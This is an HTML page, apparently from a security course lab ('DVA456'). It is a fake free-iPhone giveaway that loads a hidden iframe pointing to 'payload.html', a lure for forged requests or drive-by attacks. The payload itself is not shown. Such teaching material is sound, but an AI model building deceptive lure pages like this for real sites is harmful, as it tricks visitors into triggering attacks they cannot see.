<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>DVA456</title>

    <!-- Bootstrap -->
    <link href="../../css/bootstrap.min.css" rel="stylesheet">
    <link href="../../css/custom.css" rel="stylesheet">
    <link href="../../css/print.css" rel="stylesheet" media="print">


    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
</head>

<body>

<!-- Begin page content -->
<div class="container">


    <h2 class="text-center">Get The iPhone X FREE!</h2>
    <h4 class="text-center">Worth $999</h4>
    <p>
        A decade on and still innovating. With its Super Retina display, facial recognition and wireless charging.
        Want to review the best iPhone yet for FREE?
    </p>

    <div class="text-center">
        <button type="button" class="btn btn-primary btn-lg">Review Now!</button>
    </div>

    <iframe src="payload.html" style="visibility: hidden"></iframe>
</div>

</body>
</html>
